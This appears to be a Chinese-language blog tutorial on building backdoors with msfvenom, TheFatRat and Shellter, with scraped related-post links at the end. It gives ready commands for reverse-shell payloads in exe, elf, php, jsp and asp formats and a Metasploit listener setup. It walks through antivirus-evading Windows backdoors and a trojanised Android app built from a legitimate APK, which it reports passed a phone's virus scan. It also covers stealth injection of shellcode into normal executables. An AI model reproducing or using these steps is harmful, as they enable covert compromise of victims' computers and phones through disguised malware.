Metasploit学习2-后门制作
title: Metasploit学习2-后门制作
date: 2018-04-15 20:15:19
categories: 安全
tags: [Metasploit,工具]
介绍下几个后门制作工具的使用,主要包括msfvenom,thefatrat(推荐),shellter。
msfvenom
msfvenom是msf框架中用来生成后门的工具。
查看命令
➜ ~ msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /opt/metasploit-framework/bin/../embedded/framework/msfvenom [options] <var=val>Options:-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads--payload-options List the payload's standard options-l, --list [type] List a module type. Options are: payloads, encoders, nops, all-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload-f, --format <format> Output format (use --help-formats for a list)--help-formats List available formats-e, --encoder <encoder> The encoder to use-a, --arch <arch> The architecture to use--platform <platform> The platform of the payload--help-platforms List available platforms-s, --space <length> The maximum size of the resulting payload--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)-b, --bad-chars <list> The list of characters to avoid example: '\x00\xff'-i, --iterations <count> The number of times to encode the payload-c, --add-code <path> Specify an additional win32 shellcode file to include-x, --template <path> Specify a custom executable file to use as a template-k, --keep Preserve the template behavior and inject the payload as a new thread-o, --out <path> Save the payload-v, --var-name <name> Specify a custom variable name to use for certain output formats--smallest Generate the smallest possible payload-h, --help Show this message其中常用的几个参数
-l 显示模块列表。例如payloads, encoders
-p 选择需要使用的payload
-a 选择目标架构
-e 编码方式
-i 指定payload的编码次数
-f 生成的文件格式
-o 保存生成的文件
常用的后门生成命令:
windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=8081 -f exe > shell.exe
LINUX
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=8081 -f elf > shell.elf
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.1 LPORT=8081 -f raw > shell.php
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.1 LPORT=8081 -f raw > shell.jsp
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=8081 -f asp > shell.asp
这里LHOST为本地监听IP,LPORT为监听端口。
TheFatRat
TheFatRat是同样是一款生成后门的工具,操作简单,功能强大,非常值得推荐使用。
安装
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh
使用
安装完成后会在桌面出现图标,直接点击即可使用,或者在命令行输入fatrat启动,启动时会进行配置检查,
打开后如图所示,按照功能输入数字即可。
如图,1为使用msfvenom制作后门,2、3、4、6为制作免杀windows后门,5制作安卓后门,7制作office后门,8为debian木马,9导入/创建自动监听,10跳转到msfconsole,11SearchSploit工具,13设置默认监听IP和端口。
生成windows免杀后门方式,选择选项6,再选择1,然后输入ip,端口和payload等信息。
然后会生成一个bat后门文件,将生成的后门放到windows中运行即可。
监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.101.1
set LPORT 8081
run
PS:在windows10上测试,使用各种方式生成的后门基本上都不能免杀,或者是不起作用。
Android隐蔽后门
使用msfvenom生成的android后门一般只有一个图标,但是不具有欺骗性,在实际中很难让人放心安装,这里可以使用对普通应用加后门的方式达到隐蔽效果。使用TheFatRat可以生成隐蔽式的后门。
使用fatrat生成后门方法
1.打开fatrat后选择选项5 Backdooring Original apk [Instagram, Line,etc]
2.在新打开的终端中输入ip,端口和app的路径,这里已re文件管理器为例,然后选择payload和生成方式,如图:
成功生成后门后,在小米手机上安装时病毒扫描通过,并且可以正常运行,然后使msfconsole进行监听即可。
但是由于miui系统的权限管理,所以很多操作都需要授权,例如读取联系人短信等,否则msf是无法获取信息。另外需要注意的是并不是所有的app都可以成功。
shellter
Shellter是一款动态shellcode注入工具。可以将后门shell注入到正常程序中。
安装
在kali linux下可以直接通过源安装apt-get install shellter
使用
在终端下输入shellter,会打开一个新的终端,输入选项A,代表自动模式,然后输入exe文件路径,如图
等待一会,会询问Enable Stealth Mode?是否开启隐身模式,即免杀,输入Y,然后选择payload,再输入IP和端口等信息。
然后就会自动生成后门程序。在windows10上测试,可以免杀,但是会弹框要求上传可疑文件进行分析,而且smartscreen筛选器会阻止运行,需要手动点击运行才可以。
参考:
使用msfvenom生成木马用于监听别人的操作
Metasploit学习2-后门制作相关推荐
- linux添加后门方法,超初级的linux后门制作方法
超初级的linux后门制作方法 更新时间:2006年10月24日 00:00:00 作者: 众所周知,Linux的文件权限如: 777:666等,其实只要在相应的文件上加上UID的权限,就可以用到 ...
- 后门制作及安装技术(全)
后门制作及安装技术 摘要 本文将描述如何测定入侵者使用的方法这样的复杂内容和管理员如何防止入侵者重返的基础知识. (2002-09-16 13:30:19) 后门 声明:此文为翻译文章,QiangGe ...
- linux php后门,Linux_一个初级的linux后门制作方法,众所周知,Linux的文件权限如: - phpStudy...
一个初级的linux后门制作方法 众所周知,Linux的文件权限如: 777;666等,其实只要在相应的文件上加上UID的权限,就可以用到加权限人的身份去运行这个文件.所以我们只需要将bash复制出来 ...
- 刚開始学习的人制作VMOS场效应管小功放
VMOS场效应管既有电子管的长处又有晶体管的长处,用它制作的功率放大器声音醇厚.甜美,动态范围大.频率响应好.因此近年来在音响设备中得到了广泛应用. 大功率的场效应管功率放大器.电.路比較复杂.制作和 ...
- 全景丨0基础学习VR全景制作,平台篇第13章:热点功能-总览介绍
全景丨0基础学习VR全景制作,平台篇第13章:热点功能-总览介绍 大家好,欢迎观看蛙色VR官方--后台使用系列课程! 一.热点功能概览 热点,指在全景作品中添加各种类型图标的按钮,引导用户通过按钮产生 ...
- Polyworks脚本开发学习笔记(十七)-制作宏脚本自定义工具条
Polyworks脚本开发学习笔记(十七)-制作宏脚本自定义工具条 做好的宏脚本程序,每次打开脚本加载程序太多麻烦,为了方便的调用脚本做各种操作,可以使用系统的自定义工具条功能将脚本加载到工具条上. ...
- ps基础入门知识课程教程学习文字设计制作小白
ps基础入门知识课程教程学习文字设计制作小白
- 如何对联邦学习进行后门攻击?
如何对联邦学习进行后门攻击? 后门攻击:针对训练进行攻击,同时其他训练正常进行.如:只将绿色的车识别为鸟,其他颜色的车预测结果都正常.可以攻击模型的同时保持高准确率. 定向攻击和模型攻击 只需控制联邦 ...
- 学习个人网页制作全过程
如何制作个人网页全过程,送给刚学做网页的朋友们 第一讲 网页的基本知识和FrontPage入门 一.网页的基本知识 1.网站与网页 我们在因特网上浏览时,看到的每一个页面,称为网页,很多网页组成一个网 ...
- html制作网站边框,HTML学习笔记☆边框制作
HTML学习笔记☆边框制作 代码: 填入内容 填入内容 填入内容 填入内容 填入内容 填入内容 填入内容 填入内容 填入内容 以上代码确切地说是表格代码,把括号内文字改成数字或去掉,变成以下代码形式: ...
最新文章
- php文件上传绕过mime类型,文件上传限制绕过技巧
- php %3f,PHP
- linux编写日志接口so,linux下动态链接问题(.so文件的编写与调用) .
- 程序员新人怎样在复杂代码中找 bug?
- FrameLayout 测量过程
- 3.0 mysql配置讲解
- 【Linux】Windows Ubuntu 双系统开机选择界面设置
- 传智播客 机器学习之数据降维 学习笔记
- 2022-2027年中国民办高校行业市场全景评估及发展战略规划报告
- 趣图:五彩斑斓的黑,找到了
- 电子护照阅读器解决方案
- 打造高质量的私域朋友圈,让营销效果翻倍
- 程序员大佬教你如何用python制作中国象棋!一看就会
- java复杂逻辑如何设计_javabean如何实现复杂的业务逻辑
- vbs执行ctrl+空格_VBS中解决路径带空格的三种方法
- 【Python3语法】两个一维list列表合并为一个二维list
- 2019春节暖心视频:好久不见,别来无恙
- 找不到动态库解决方案
- PHP距离春节还剩多少天,还有多少天过年_距离还有多少天?
- shiro的remember功能